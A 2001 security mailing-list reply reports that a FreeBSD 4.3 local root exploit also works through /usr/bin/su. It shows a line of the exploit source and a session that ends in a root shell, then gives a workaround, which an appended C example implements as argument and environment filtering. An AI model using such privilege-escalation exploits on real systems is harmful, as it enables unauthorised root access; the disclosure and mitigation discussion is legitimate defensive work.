Re: FreeBSD 4.3 local root

From: Przemyslaw Frasunek (venglinat_private)
Date: Wed Jul 11 2001 - 05:31:06 PDT


    > Well, after a bunch of tests I've found only two suids which gave me
    > suid shell:
    > /usr/bin/passwd
    > /usr/local/bin/ssh1
    
    /usr/bin/su also works for me:
    
    riget:venglin:~> egrep -e execl vvfreebsd.c
      if(!execl("/usr/bin/su","su","szymon",0))
    
    riget:venglin:~> ./v
    vvfreebsd. Written by Georgi Guninski
    shall jump to bfbffe72
    child=57660
    Password:done
    # id
    uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
    
    > So, quick workaround should be
    
    Quick workaround is to limit arguments, environment and filter non-ascii
    characters:
    
    http://www.frasunek.com/sources/security/rexec/
    
    --
    * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
    * Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF *
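
The workaround named in the message (limit arguments, limit environment, filter non-ASCII characters) can be expressed as a policy check that a wrapper runs before exec'ing a set-uid binary. The C code below is an added example, not part of the original post and not the rexec source linked above; the limits, the `exec_request_allowed` name and the exact byte range treated as acceptable are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical limits chosen for illustration; not taken from rexec. */
#define MAX_ARGS       64
#define MAX_ARG_LEN    1024
#define MAX_ENV_VARS   128
#define MAX_ENV_BYTES  8192

enum verdict { V_OK = 0, V_TOO_MANY, V_TOO_LONG, V_NON_ASCII };

/* Returns 1 if every byte of s is printable ASCII (0x20..0x7e) or a tab. */
static int is_clean_ascii(const char *s)
{
    for (const unsigned char *p = (const unsigned char *)s; *p; p++)
        if ((*p < 0x20 && *p != '\t') || *p > 0x7e)
            return 0;
    return 1;
}

/* Check one NULL-terminated vector against a count, per-string and total cap. */
static enum verdict check_vector(char *const v[], size_t max_items,
                                 size_t max_len, size_t max_total)
{
    size_t total = 0;
    for (size_t i = 0; v != NULL && v[i] != NULL; i++) {
        if (i >= max_items)
            return V_TOO_MANY;
        size_t len = strlen(v[i]);
        total += len + 1;               /* count the terminating NUL too */
        if (len > max_len || total > max_total)
            return V_TOO_LONG;
        if (!is_clean_ascii(v[i]))
            return V_NON_ASCII;
    }
    return V_OK;
}

/* Policy decision a wrapper would make before exec'ing a set-uid binary. */
enum verdict exec_request_allowed(char *const argv[], char *const envp[])
{
    enum verdict r = check_vector(argv, MAX_ARGS, MAX_ARG_LEN,
                                  (size_t)MAX_ARGS * MAX_ARG_LEN);
    if (r != V_OK)
        return r;
    return check_vector(envp, MAX_ENV_VARS, MAX_ARG_LEN, MAX_ENV_BYTES);
}
```

A wrapper would call this on the caller-supplied `argv` and `envp` and refuse to exec on any verdict other than `V_OK`.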
    


